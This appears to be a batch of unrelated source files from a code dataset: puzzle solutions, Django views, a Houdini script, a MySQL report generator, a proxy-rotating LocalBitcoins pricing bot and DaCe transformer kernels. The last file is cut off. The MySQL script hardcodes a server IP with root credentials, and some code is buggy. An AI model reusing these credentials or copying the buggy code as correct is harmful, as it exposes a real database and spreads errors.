+{"seq_id":"446223946","text":"\nWS = 25\n\n\ndef do_it(filename):\n with open(filename) as f:\n lines = list(map(int, f))\n for i in range(WS + 1, len(lines)):\n s = set(lines[i - WS:i])\n for j in s:\n if (lines[i] - j) in s:\n break\n else:\n return i, lines[i]\n\n\nif __name__ == '__main__':\n output = do_it('091.txt')\n print(f'Result: {output}')\n\n# Result: 22477624\n","sub_path":"2020/09/091.py","file_name":"091.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"176265954","text":"import markdown\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http.response import HttpResponse, HttpResponseForbidden\nfrom django.views.generic.base import View\nfrom wkhtmltopdf.views import PDFTemplateView\n\nfrom trans.models import User, ContentVersion, Translation, Task\n\n\nclass VersionDownloadMixin(object):\n def get_file_format(self):\n return self.file_format\n\n def get_version(self):\n version_id = self.request.GET['id']\n content_version = ContentVersion.objects.filter(id=version_id).first()\n return content_version\n\n # TODO I MUST refactor this method\n def get_version_text(self):\n content_type_model = self.request.GET.get('type', None)\n id = self.request.GET['id']\n user = User.objects.get(username=self.request.user.username)\n if content_type_model:\n task = Task.objects.filter(id=id).first()\n if task is None or task.contest.public == False:\n return None\n if content_type_model == 'translation':\n translation = Translation.objects.filter(user=user, task=task).first()\n if translation is None or translation.user != user:\n return None\n return translation.get_latest_text()\n elif content_type_model == 'task':\n return task.get_published_text()\n else:\n return None\n\n content_version = ContentVersion.objects.filter(id=id).first()\n if not content_version.can_view_by(user):\n return None\n return content_version.text\n\n # TODO I MUST refactor this method\n def get_filename(self):\n # version = self.get_version()\n # obj = version.content_object\n # created = version.create_time\n # return \"%s_%d-%d-%d %d:%d.%s\" % (obj.title, created.year, created.month, created.day,\n # created.hour, created.minute, self.get_file_format())\n content_type_model = self.request.GET.get('type', None)\n id = self.request.GET['id']\n user = User.objects.get(username=self.request.user.username)\n if content_type_model:\n task = Task.objects.filter(id=id).first()\n if task is None or task.contest.public == False:\n return None\n if content_type_model == 'translation':\n translation = Translation.objects.filter(user=user, task=task).first()\n if translation is None or translation.user != user:\n return None\n return \"%s-%s-%s.%s\" % (\n task.name, translation.user.language, translation.get_latest_change_time(), self.get_file_format())\n elif content_type_model == 'task':\n return \"%s-%s-%s.%s\" % (task.name, \"ISC\", task.get_latest_change_time(), self.get_file_format())\n else:\n return None\n\n content_version = ContentVersion.objects.filter(id=id).first()\n if not content_version.can_view_by(user):\n return None\n if content_version.content_type.model == \"translation\":\n return \"%s-%s-%s.%s\" % (\n content_version.content_object.task.name, content_version.content_object.user.language,\n content_version.content_object.get_latest_change_time(), self.get_file_format())\n else:\n return \"%s-%s-%s.%s\" % (\n content_version.content_object.title, \"ISC\", content_version.content_object.get_latest_change_time(),\n self.get_file_format())\n\n\nclass GetVersionPDF(VersionDownloadMixin, LoginRequiredMixin, PDFTemplateView):\n file_format = 'pdf'\n template_name = 'pdf-template.html'\n cmd_options = {\n 'page-size': 'A4',\n 'margin-top': '0.75in',\n 'margin-right': '0.75in',\n 'margin-bottom': '0.75in',\n 'margin-left': '0.75in',\n # 'zoom': 15,\n 'javascript-delay': 500,\n }\n\n def get_context_data(self, **kwargs):\n context = super(GetVersionPDF, self).get_context_data(**kwargs)\n # version = self.get_version()\n #\n # content = 
version.text\n content = self.get_version_text()\n context['direction'] = 'ltr'\n context['content'] = content\n context['title'] = self.get_filename()\n return context\n\n\nclass GetVersionMarkDown(VersionDownloadMixin, LoginRequiredMixin, View):\n file_format = 'md'\n\n def get(self, request, *args, **kwargs):\n # version = self.get_version()\n # user = User.objects.get(username=self.request.user.username)\n # if version.can_view_by(user) == False:\n # HttpResponseForbidden()\n\n content = self.get_version_text()\n response = HttpResponse(content, content_type='text/plain; charset=UTF-8')\n return response\n","sub_path":"trans/views/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":4857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"210365544","text":"# -*- coding: utf-8 -*-\n\nimport re,os,hou\ndef main():\n reg = re.compile(\"v[0-9]{1,3}\")\n parmlist = [\"vm_picture\",\"file\",\"sopoutput\",\"filename1\",\"RS_outputFileNamePrefix\"]\n nodes = hou.selectedNodes()\n if nodes is not None:\n for nd in nodes:\n ndpath = nd.path()\n for parm in nd.parms():\n if parm.name() in parmlist:\n code = parm.asCode()\n val = code.split('hou_parm.set(\"')[1].split('\")')[0]\n vlst = re.findall(\"v[0-9]{1,3}\",val)\n if vlst is not None:\n new_vlst = []\n for v in vlst:\n num = int(v[1:])\n pad = \"%s0%dd\" % (\"v%\",len(v[1:]))\n nv = pad % (num+1)\n new_vlst.append(nv)\n tmp1 = re.split(\"v[0-9]{1,3}\",val)\n i = 1\n for v in new_vlst:\n tmp1.insert(i,v)\n i = i+2\n val = \"\".join(tmp1)\n parm.set(val)\n\nif __name__ =='__main__':\n main()","sub_path":"python2.7libs/_backup/auto_path_up_version.py","file_name":"auto_path_up_version.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"43499312","text":"from datetime import date\nfrom django import forms\n\n\nclass DateForm(forms.Form):\n date = forms.DateField(initial=date.today, label='Fecha')\n\n @classmethod\n def get_default_form(cls):\n d = {\n 'date': cls.base_fields['date'].initial()\n }\n\n f = cls(d)\n assert f.is_valid()\n return f\n","sub_path":"tracker/forms/date_form.py","file_name":"date_form.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"364262451","text":"from 基础知识.数据库存储.Mysql import pymysql_util\nimport pymysql\nfrom 基础知识.文档操作.excel import excel_util\n\n\ndef get_db():\n # 打开数据库连接\n db = pymysql.connect(\n host=\"123.206.227.74\", user=\"root\",\n password=\"exue2017\", db=\"sit_exue_resource\", port=3306,\n charset=\"utf8\"\n )\n return db\n\n\n# 查询某个学科信息\n# ('语文', '9', '语文北师版九上', '第二单元', '口技', 'edition_id', 'chapter_id')\ndef book_sql(subject_name):\n sql = \"SELECT b.subject_name,gb.grade,b.book_name,u.unit_name,c.chapter_name,b.edition_id,c.chapter_id \"\n sql += \"from t_res_chapter c \"\n sql += \"LEFT JOIN t_res_units u on c.unit_id = u.unit_id \"\n sql += \"LEFT JOIN t_res_book b on c.book_id = b.book_id \"\n sql += \"LEFT JOIN t_res_graduate_book gb on c.book_id = gb.book_id \"\n sql += \"WHERE b.subject_name = '%s'\"\n return sql % subject_name\n\n\n# 查询二月份之后录入题目数量\ndef sql_count_new(subject_key):\n sql = \"SELECT qc.chapter_id,count(qc.question_uuid) from t_res_%s_question_chapter qc LEFT JOIN t_res_%s_question q \"\n sql += \"on qc.question_uuid = q.uuid where type in ('2','11') \"\n sql += \"and q.create_time > '2018-02-01 00:00:00' GROUP BY qc.chapter_id\"\n return sql % (subject_key, subject_key)\n\n\n# 查询二月份之前录入题目数量\ndef sql_count_old(subject_key):\n sql = \"SELECT qc.chapter_id,count(qc.question_uuid) from t_res_%s_question_chapter qc LEFT JOIN t_res_%s_question q \"\n sql += \"on qc.question_uuid = q.uuid where type in ('2','11') \"\n sql += \"and q.create_time < '2018-02-01 00:00:00' GROUP BY qc.chapter_id\"\n return sql % (subject_key, subject_key)\n\n\ndef main(subject_key, subject_name):\n result_new = pymysql_util.find_all(db, sql_count_new(subject_key)) # '章节id','数量'\n result_old = pymysql_util.find_all(db, sql_count_old(subject_key))\n\n editor_sql = \"SELECT edition_id,CONCAT(press_name,edition_name) from t_res_editor\"\n editors = pymysql_util.find_all(db, editor_sql)\n\n result_book = pymysql_util.find_all(db, book_sql(subject_name))\n # ('语文', '9', '语文北师版九上', '第二单元', '口技', 'edition_id', 'chapter_id')\n result_data = [[\"学科\", \"年级\", \"课本\", \"单元\", \"章节\", \"教材\", \"学乐数量\", \"二月新增数量\"]]\n for book in result_book:\n li = [book[0], book[1], book[2], book[3], book[4], 0, 0, 0]\n for editor in editors: # 教材\n if editor[0] == book[5]:\n li[5] = editor[1]\n for result in result_old: # 学乐云数量\n if book[6] == result[0]:\n li[6] = result[1]\n for result in result_new: # 二月新增数量\n if book[6] == result[0]:\n li[7] = result[1]\n result_data.append(li)\n excel_util.create_excel(result_data, \"%s(单选判断)统计.xlsx\" % subject_name)\n\n\nif __name__ == '__main__':\n db = get_db()\n sub_key = [\"yw\", \"sx\", \"yy\", \"dl\", \"hx\", \"ls\", \"wl\", \"zz\", \"sw\", 'kx', \"sp\", \"dd\", \"ty\", \"ms\", \"mu\"]\n sub_name = [\"语文\", \"数学\", \"英语\", \"地理\", \"化学\", \"历史\", \"物理\", \"政治\", \"生物\", \"科学\", \"思想品德\", \"道德与法治\", \"体育\", \"美术\", \"音乐\"]\n for i in range(len(sub_key)):\n main(sub_key[i], sub_name[i])\n","sub_path":"工作/题目查询/select.py","file_name":"select.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"57603936","text":"# class CocaCola:\n# \tit_taste = 'So good!'\n#\n#\n# coke_for_bum = CocaCola()\n# coke_for_president = CocaCola()\n# print(coke_for_bum.it_taste)\n# print(coke_for_president.it_taste)\n\n# 定义一个类\n# 在类里面赋值的变量就是类的变量,类的变量有一个专有的术语,叫做类的属性\n\n\n# class CocaCola:\n# \tformula = ['caffeine', 'sugar', 'water', 'soda']\n#\n# \t# 构造函数,实例化类的时候会默认执行这个方法\n# \t# 可以接受参数,不需要调用方法,在实例化的时候在括号里面加上参数即可\n# \tdef __int__(self, logo_name='可口可乐'):\n# \t\tself.local_logo = logo_name\n#\n# \t# 实例方法\n# \t# 被实例化的对象会传入后面方法的括号中\n# \tdef drink(self, how_much):\n# \t\tif how_much == 'a sip':\n# \t\t\tprint('Cool~')\n# \t\telif how_much == 'whole bottle':\n# \t\t\tprint('Headache!')\n#\n#\n# # 类的实例化\n# coke_for_me = CocaCola()\n# coke_for_you = CocaCola()\n# coke_for_China = CocaCola()\n# # 在创建类之后为新实例化的对象添加的属性就是实例属性\n# coke_for_China.local_logo = '可口可乐'\n#\n# coke = CocaCola()\n# # coke.drink()\n# ice_coke = CocaCola()\n# ice_coke.drink('a sip')\n#\n#\n# # 类属性的引用\n# # 在类的名字后面输入.加上属性的名称,这就是类属性的引用\n\n\n# 类的继承\n\nclass CocaCola:\n\tcalories = 140\n\tsodium = 45\n\ttotal_carb = 39\n\tcaffeine = 34\n\tingredients = [\n\t\t'High Fructose Corn Syrup',\n\t\t'Carbonated Water',\n\t\t'Phosphoric Acid',\n\t\t'Natural Flavors',\n\t\t'Caramel Color',\n\t\t'Caffeine',\n\t]\n\n\tdef __int__(self, logo_name):\n\t\tself.local_logo = logo_name\n\n\tdef drink(self):\n\t\tprint('You got {} cal energy!'.format(self.calories))\n\n\n# 在新的类后面的括号中放入CocaCola,这就表示这个类是继承与CocaCola这个父类的\n# 类中的变量和方法可以完全被子类继承,如有需要特殊的改动也可以进行覆盖\nclass CaffeineFree(CocaCola):\n\tcaffeine = 0\n\tingredients = [\n\t\t'High Fructose Corn Syrup',\n\t\t'Carbonated Water',\n\t\t'Phosphoric Acid',\n\t\t'Natural Flavors',\n\t\t'Caramel Color',\n\t]\n\n\ncoke_a = CaffeineFree('Cocacola-FREE')\ncoke_a.drink()\n\n\n\n\n\n\n","sub_path":"Class/Class.py","file_name":"Class.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"16691602","text":"import asyncio\nimport io\nimport os\nimport ssl\nimport typing\nfrom http.client import _encode\nfrom urllib.parse import urlparse\n\nimport h11\nimport requests\nimport urllib3\n\nfrom .connections import ConnectionManager\n\n\nclass HTTPAdapter:\n def __init__(self):\n self.manager = ConnectionManager()\n\n async def send(\n self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None\n ) -> requests.Response:\n urlparts = urlparse(request.url)\n\n if isinstance(timeout, tuple):\n connect_timeout, read_timeout = timeout\n else:\n connect_timeout = timeout\n read_timeout = timeout\n\n connection = await self.manager.get_connection(\n url=urlparts, verify=verify, cert=cert, timeout=connect_timeout\n )\n\n target = urlparts.path\n if urlparts.query:\n target += \"?\" + urlparts.query\n headers = [(\"host\", urlparts.netloc)] + list(request.headers.items())\n\n message = h11.Request(method=request.method, target=target, headers=headers)\n await connection.send_event(message)\n\n if request.body:\n body = (\n _encode(request.body) if isinstance(request.body, str) else request.body\n )\n message = h11.Data(data=body)\n await connection.send_event(message)\n\n message = h11.EndOfMessage()\n await connection.send_event(message)\n\n status_code = 0\n headers = []\n reason = b\"\"\n buffer = io.BytesIO()\n\n while True:\n event = await connection.receive_event(read_timeout)\n event_type = type(event)\n\n if event_type is h11.Response:\n status_code = event.status_code\n headers = [\n (key.decode(), value.decode()) for key, value in event.headers\n ]\n reason = event.reason\n\n elif event_type is h11.Data:\n buffer.write(event.data)\n\n elif event_type is h11.EndOfMessage:\n buffer.seek(0)\n break\n\n await connection.close()\n\n resp = urllib3.HTTPResponse(\n body=buffer,\n headers=headers,\n status=status_code,\n reason=reason,\n preload_content=False,\n )\n\n return self.build_response(request, resp)\n\n async def close(self):\n pass\n\n def build_response(self, req, resp):\n \"\"\"Builds a :class:`Response ` object from a urllib3\n response. This should not be called from user code, and is only exposed\n for use when subclassing the\n :class:`HTTPAdapter `\n :param req: The :class:`PreparedRequest ` used to generate the response.\n :param resp: The urllib3 response object.\n :rtype: requests.Response\n \"\"\"\n response = requests.models.Response()\n\n # Fallback to None if there's no status_code, for whatever reason.\n response.status_code = getattr(resp, \"status\", None)\n\n # Make headers case-insensitive.\n response.headers = requests.structures.CaseInsensitiveDict(\n getattr(resp, \"headers\", {})\n )\n\n # Set encoding.\n response.encoding = requests.utils.get_encoding_from_headers(response.headers)\n response.raw = resp\n response.reason = response.raw.reason\n\n if isinstance(req.url, bytes):\n response.url = req.url.decode(\"utf-8\")\n else:\n response.url = req.url\n\n # Add new cookies from the server.\n requests.cookies.extract_cookies_to_jar(response.cookies, req, resp)\n\n # Give the Response some context.\n response.request = req\n response.connection = self\n\n return response\n","sub_path":"requests_async/adapters.py","file_name":"adapters.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"105066294","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Copyright (C) 2014 Eficent ()\n# \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\nfrom openerp.osv import orm, fields\n\n\nclass procurement_order(orm.Model):\n _inherit = \"procurement.order\"\n\n def make_po(self, cr, uid, ids, context=None):\n res = super(procurement_order, self).make_po(cr, uid, ids,\n context=context)\n requisition_line_obj = self.pool.get('purchase.requisition.line')\n for procurement in self.browse(cr, uid, ids, context=context):\n if procurement.analytic_account_id and procurement.requisition_id:\n for line_id in procurement.requisition_id.line_ids:\n requisition_line_obj.write(\n cr, uid, [line_id.id], {\n 'account_analytic_id':\n procurement.analytic_account_id.id})\n\n return res","sub_path":"purchase_requisition_procurement_analytic/model/procurement.py","file_name":"procurement.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"34775951","text":"import yaml\nimport os\nimport Get_Trello_MoodleEPN_Keys\n\n\ndef load_config_file(config_file):\n while(True):\n try:\n with open(get_file_location(config_file), 'r') as config_yaml:\n file_config = yaml.safe_load(config_yaml)\n return file_config\n except IOError:\n print(\"Archivo de configuración no encontrado, generando llaves\")\n Get_Trello_MoodleEPN_Keys.onboard(False)\n\n\ndef get_file_location(filename):\n workingDirectory = os.path.dirname(os.path.realpath(__file__))\n return os.path.join(workingDirectory, filename)\n","sub_path":"configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"227121936","text":"from __future__ import unicode_literals\nimport requests\nimport requests.auth\nfrom datetime import datetime\nimport time\nimport api\nfrom config import *\nfrom API_keys import *\n\nurl = buy_list + '.json'\nMe_1 = BuyURL\nMe_id_1 = Me_1.split('/')[-2]\nMe_3_1 = str(\"/api/ad-equation/\" + Me_id_1 + \"/\")\nurl2 = 'https://httpbin.org/ip'\n\n\ndef loadqiwi(session, nam=None):\n \n ''' API запрос'''\n \n global t, a\n if nam is None:\n t = session.get(url).json()['data']['ad_list']\n else:\n session.proxies = {'https': proxy_logpas + nam}\n t = session.get(url).json()['data']['ad_list']\n return t\n\n\ndef info(req, High=None):\n \n '''Определение max цены'''\n \n lst = []\n for trader in range(len(req)):\n visible = req[trader]['data']['visible']\n price = float(req[trader]['data']['temp_price'])\n username = req[trader]['data']['profile']['username']\n if visible is False or price > High or any(word in username for word in list_ignore):\n pass\n else:\n lst.append(price)\n params = {u'price_equation': str(round(float(max(lst) + X), 2))}\n return params\n\n\n\ndef torg_loc(params, nam=None):\n \n '''API изменения цены'''\n \n if nam is None:\n nowtime = datetime.now().strftime('%H:%M:%S.%f')\n a = api.hmac(hmac_key, hmac_secret).call('POST', Me_3_1, params).json()\n print(\"-------------------------------------------------------\", )\n print(str(a) + nowtime + \" Новая цена : \" + str(params.get('price_equation')) + '\\t')\n else:\n nowtime = datetime.now().strftime('%H:%M:%S.%f')\n a = api.hmac(hmac_key, hmac_secret, proxy = {'https': proxy_logpas + nam}).call('POST', Me_3_1, params).json()\n print(\"-------------------------------------------------------\", )\n print(str(a) + nowtime + \" Новая цена : \" + str(params.get('price_equation')) + '\\t' + nam)\n\n\n\ndef bay():\n\n '''Отправка первого сообщения'''\n \n conn = api.hmac(hmac_key, hmac_secret)\n n = None\n while True:\n try:\n n = conn.call('GET', '/api/notifications/').json()['data']\n except Exception as e:\n print(e)\n\n for i, e in reversed(list(enumerate(n))):\n\n if e['read'] == False:\n s = e['msg'] # тело сообщения\n d = str(e['id']) # id сообщения\n d1 = str('/api/notifications/mark_as_read/' + d + '/') # api ключ\n k = str(e['contact_id']) # id сделки\n k1 = str('/api/contact_message_post/' + k + '/')\n\n if 'Вы получили новое предложение' in s:\n print('есть сообщение!')\n print('начинаем процесс отправки реквезитов!!!')\n conn.call('POST', k1, Msg1.encode('utf-8')).json()\n conn.call('POST', d1).json()\n print('\\t реквезиты отправлены.\\n')\n continue\n time.sleep(10)\n\n\n\ndef main():\n requests_proxi = []\n api_proxy = []\n index_proxy = 0\n\n ''' Список проксей'''\n \n with open('12.txt') as f:\n for index, line in enumerate(f):\n if index < 6:\n requests_proxi.append(line.replace('*******', '').strip())\n else:\n api_proxy.append(line.replace('********', '').strip())\n\n with requests.Session() as session:\n while True:\n \n try:\n \n ''' Tекущая цена BTC'''\n \n high = float(session.get('https://api.coindesk.com/v1/bpi/currentprice.json').json()['bpi']['USD']['rate'].replace(',','').split('.')[0]) * kurs * 0.99\n except Exception as e:\n print(e)\n\n ''' Основной цекл скрипта'''\n \n for i in requests_proxi:\n try:\n a = loadqiwi(session, nam=i)\n torg_loc(info(a, High=high), nam=api_proxy[index_proxy])\n except Exception as e:\n print(e)\n \n index_proxy +=1\n if index_proxy > len(api_proxy) - 1:\n index_proxy = 0\n\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"293964492","text":"#Given a string s, remove duplicate letters so that every letter appears once and only once. You must make sure your result is the smallest in lexicographical order among all possible results.\n\n#Note: This question is the same as 1081: https://leetcode.com/problems/smallest-subsequence-of-distinct-characters/\n\n\n\n#Example 1:\n\n#Input: s = \"bcabc\"\n#Output: \"abc\"\n#Example 2:\n\n#Input: s = \"cbacdcbc\"\n#Output: \"acdb\"\n\n\n#Constraints:\n\n#1 <= s.length <= 104\n#s consists of lowercase English letters.\n\nclass Solution:\n def removeDuplicateLetters(self, s: str) -> str:\n count = [0] * 26\n for i in range(len(s)):\n count[ord(s[i]) - ord('a')] += 1\n stack = []\n present = {}\n for i in range(len(s)):\n count[ord(s[i]) - ord('a')] -= 1\n\n if s[i] in present: continue\n\n while stack and ord(stack[-1]) > ord(s[i]) and count[ord(stack[-1])-ord('a')]:\n del present[stack[-1]]\n stack.pop()\n stack.append(s[i])\n present[s[i]] = True\n return \"\".join(stack)\na = Solution()\ns = \"cbacdcbc\"\na.removeDuplicateLetters(s)\n\n","sub_path":"python_code/316_Remove_Duplicate_Letters.py","file_name":"316_Remove_Duplicate_Letters.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"600713337","text":"import dace\nimport numpy as np\nimport math\nimport os\n\n# Imported to register transformation\nfrom substation.xforms.merge_source_sink import MergeSourceSinkArrays\n\nfrom substation.attention import attn_forward_sdfg\nfrom substation.dtypes import *\n\nB, H, N, P, SM, SN = (dace.symbol(s) for s in ['B', 'H', 'N', 'P', 'SM', 'SN'])\nemb = dace.symbol('emb')\neps = 1e-5\n\n\n@dace.program\ndef gelu(x: dace_dtype[B, SM, N]):\n \"\"\"Gaussian Error Linear Unit applied to x.\"\"\"\n out = np.ndarray(x.shape, x.dtype)\n for i, j, k in dace.map[0:B, 0:SM, 0:N]:\n with dace.tasklet:\n inp << x[i, j, k]\n outp >> out[i, j, k]\n outp = 0.5 * inp * (1 + math.tanh(\n math.sqrt(2.0 / math.pi) * (inp + 0.044715 * (inp**3))))\n return out\n\n\n@dace.program\ndef linear(x: dace_dtype[B, SM, N], w: dace_dtype[emb, N]):\n \"\"\"Fully-connected layer with weights w applied to x, and optional bias b.\n\n x is of shape (batch, *).\n w is of shape (num_inputs, num_outputs).\n\n \"\"\"\n return x @ np.transpose(w)\n\n\n@dace.program\ndef linear_with_bias(x: dace_dtype[B, SM, N], w: dace_dtype[emb, N],\n bias: dace_dtype[emb]):\n \"\"\"Fully-connected layer with weights w and bias.\"\"\"\n out = np.ndarray([B, SM, emb], x.dtype)\n outb = np.ndarray([B, SM, emb], x.dtype)\n for i in dace.map[0:B]:\n out[i] = x[i] @ np.transpose(w[:])\n for i, j, k in dace.map[0:B, 0:SM, 0:emb]:\n with dace.tasklet:\n inp << out[i, j, k]\n b << bias[k]\n outp >> outb[i, j, k]\n outp = inp + b\n return outb\n\n\n@dace.program\ndef meanstd(x: dace_dtype[B, SM, N]):\n mean = np.ndarray([B, SM], x.dtype)\n std = np.ndarray([B, SM], x.dtype)\n\n moment = dace.reduce(lambda a, b: a + b, x, axis=2, identity=0)\n second_moment = dace.reduce(lambda a, b: a + b * b, x, axis=2, identity=0)\n\n for i, j in dace.map[0:B, 0:SM]:\n with dace.tasklet:\n fmom << moment[i, j]\n mn >> mean[i, j]\n mn = fmom / (SM * B)\n with dace.tasklet:\n fmom << moment[i, j]\n smom << second_moment[i, j]\n st >> std[i, j]\n st = (smom - (fmom * fmom)) / (SM * B)\n\n return mean, std\n\n\n@dace.program\ndef layer_norm(x: dace_dtype[B, SM, N]):\n \"\"\" Apply layer normalization to x. 
\"\"\"\n out = np.ndarray(x.shape, x.dtype)\n mean, std = meanstd(x)\n for i, j, k in dace.map[0:B, 0:SM, 0:N]:\n with dace.tasklet:\n in_x << x[i, j, k]\n in_m << mean[i, j]\n in_s << std[i, j]\n o >> out[i, j, k]\n o = (in_x - in_m) / (in_s + eps)\n return out\n\n\n@dace.program\ndef layer_norm_scaled(x: dace_dtype[B, SM, N], scale: dace_dtype[N],\n bias: dace_dtype[N]):\n \"\"\"Apply layer normalization to x, with scale and bias.\n\n scale and bias are the same shape as the final axis.\n\n \"\"\"\n out = np.ndarray(x.shape, x.dtype)\n mean, std = meanstd(x)\n for i, j, k in dace.map[0:SM, 0:B, 0:N]:\n with dace.tasklet:\n in_scal << scale[k]\n in_bias << bias[k]\n in_x << x[i, j, k]\n in_m << mean[i, j]\n in_s << std[i, j]\n o >> out[i, j, k]\n o = in_scal * ((in_x - in_m) / (in_s + eps)) + in_bias\n return out\n\n\n@dace.program\ndef dropout(x: dace_dtype[B, SM, N], mask: dace_dtype[B, SM, N]):\n \"\"\"Apply dropout with pre-randomized dropout mask.\"\"\"\n return x * mask\n\n\n@dace.program\ndef softmax(X_in: dace_dtype[H, B, SN, SM]):\n tmp_max = dace.reduce(lambda a, b: max(a, b), X_in, axis=3)\n tmp_out = np.ndarray([H, B, SN, SM], dtype=dace_dtype)\n out = np.ndarray([H, B, SN, SM], dtype=dace_dtype)\n\n # No broadcasting rules\n for i, j, k, l in dace.map[0:H, 0:B, 0:SN, 0:SM]:\n with dace.tasklet:\n inp << X_in[i, j, k, l]\n mx << tmp_max[i, j, k]\n o >> tmp_out[i, j, k, l]\n o = math.exp(inp - mx)\n #tmp_out = np.exp(X_in - tmp_max)\n\n tmp_sum = dace.reduce(lambda a, b: a + b, tmp_out, identity=0, axis=3)\n for i, j, k, l in dace.map[0:H, 0:B, 0:SN, 0:SM]:\n with dace.tasklet:\n inp << tmp_out[i, j, k, l]\n sm << tmp_sum[i, j, k]\n o >> out[i, j, k, l]\n o = inp / sm\n\n return out\n\n\n@dace.program\ndef mha_forward(q: dace_dtype[B, SN, N], k: dace_dtype[B, SM, N],\n v: dace_dtype[B, SM, N], wq: dace_dtype[P, H, N],\n wk: dace_dtype[P, H, N], wv: dace_dtype[P, H, N],\n wo: dace_dtype[P, H, N], scaler: dace_dtype):\n qq = np.einsum(\"phi,bji->phbj\", wq, q)\n kk = np.einsum(\"phi,bki->phbk\", wk, k)\n vv = np.einsum(\"phi,bki->phbk\", wv, v)\n beta = scaler * np.einsum(\"phbk,phbj->hbjk\", kk, qq)\n alpha = softmax(beta)\n gamma = np.einsum(\"phbk,hbjk->phbj\", vv, alpha)\n out = np.einsum(\"phi,phbj->bji\", wo, gamma)\n return out\n\n\n\n@dace.program\ndef encoder(x: dace_dtype[B, SM,\n N], attn_wq: dace_dtype[P, H,\n N], attn_wk: dace_dtype[P, H,\n N],\n attn_wv: dace_dtype[P, H, N], attn_wo: dace_dtype[P, H, N],\n attn_scale: dace_dtype, norm1_scale: dace_dtype[N],\n norm1_bias: dace_dtype[N], norm2_scale: dace_dtype[N],\n norm2_bias: dace_dtype[N], linear1_w: dace_dtype[emb, N],\n linear1_b: dace_dtype[emb], linear2_w: dace_dtype[N, emb],\n linear2_b: dace_dtype[N], attn_dropout: dace_dtype[B, SM, N],\n linear1_dropout: dace_dtype[B, SM,\n emb], ff_dropout: dace_dtype[B, SM,\n N]):\n\n # Self-attention.\n # attn = np.ndarray(x.shape, x.dtype)\n # attn_forward(Q=x,\n # K=x,\n # V=x,\n # WQ=attn_wq,\n # WK=attn_wk,\n # WV=attn_wv,\n # WO=attn_wo,\n # scaler=attn_scale,\n # OUT=attn,\n # B=B,\n # H=H,\n # N=N,\n # P=P,\n # SM=SM,\n # SN=SM)\n attn = mha_forward(x, x, x, attn_wq, attn_wk, attn_wv, attn_wo, attn_scale)\n\n # Residual connection.\n attn_resid = dropout(attn, attn_dropout) + x # B x SM x N\n\n normed1 = layer_norm_scaled(attn_resid, norm1_scale,\n norm1_bias) # B x SM x N\n\n # Feedforward network.\n ff = linear_with_bias(\n dropout(\n gelu(linear_with_bias(normed1, linear1_w,\n linear1_b)), # B x SM x emb\n linear1_dropout),\n linear2_w,\n linear2_b) # B x SM x 
N\n\n    # Residual connection.\n    ff_resid = dropout(ff, ff_dropout) + normed1  # B x SM x N\n    normed2 = layer_norm_scaled(ff_resid, norm2_scale,\n                                norm2_bias)  # B x SM x N\n    return normed2\n\n\n@dace.program\ndef decoder(x: dace_dtype[B, SM, N], attn_wq: dace_dtype[P, H, N],\n            attn_wk: dace_dtype[P, H, N], attn_wv: dace_dtype[P, H, N],\n            attn_wo: dace_dtype[P, H, N], attn_scale: dace_dtype,\n            attn_mask: dace_dtype[SM, SM], norm1_scale: dace_dtype[N],\n            norm1_bias: dace_dtype[N], norm2_scale: dace_dtype[N],\n            norm2_bias: dace_dtype[N], linear1_w: dace_dtype[emb, N],\n            linear1_b: dace_dtype[emb], linear2_w: dace_dtype[N, emb],\n            linear2_b: dace_dtype[N], attn_dropout: dace_dtype[B, SM, N],\n            linear1_dropout: dace_dtype[B, SM,\n                                        emb], ff_dropout: dace_dtype[B, SM,\n                                                                     N]):\n    # Masked self-attention.\n    attn = np.ndarray(x.shape, x.dtype)\n    attn_forward_mask(Q=x,\n                      K=x,\n                      V=x,\n                      WQ=attn_wq,\n                      WK=attn_wk,\n                      WV=attn_wv,\n                      WO=attn_wo,\n                      scaler=attn_scale,\n                      OUT=attn,\n                      MASK=attn_mask,\n                      B=B,\n                      H=H,\n                      N=N,\n                      P=P,\n                      SM=SM,\n                      SN=SM)\n\n    # Residual connection.\n    attn_resid = dropout(attn, attn_dropout) + x\n    normed1 = layer_norm_scaled(attn_resid, norm1_scale, norm1_bias)\n    # Feedforward network.\n    ff = linear_with_bias(\n        dropout(gelu(linear_with_bias(normed1, linear1_w, linear1_b)),\n                linear1_dropout), linear2_w, linear2_b)\n    # Residual connection.\n    ff_resid = 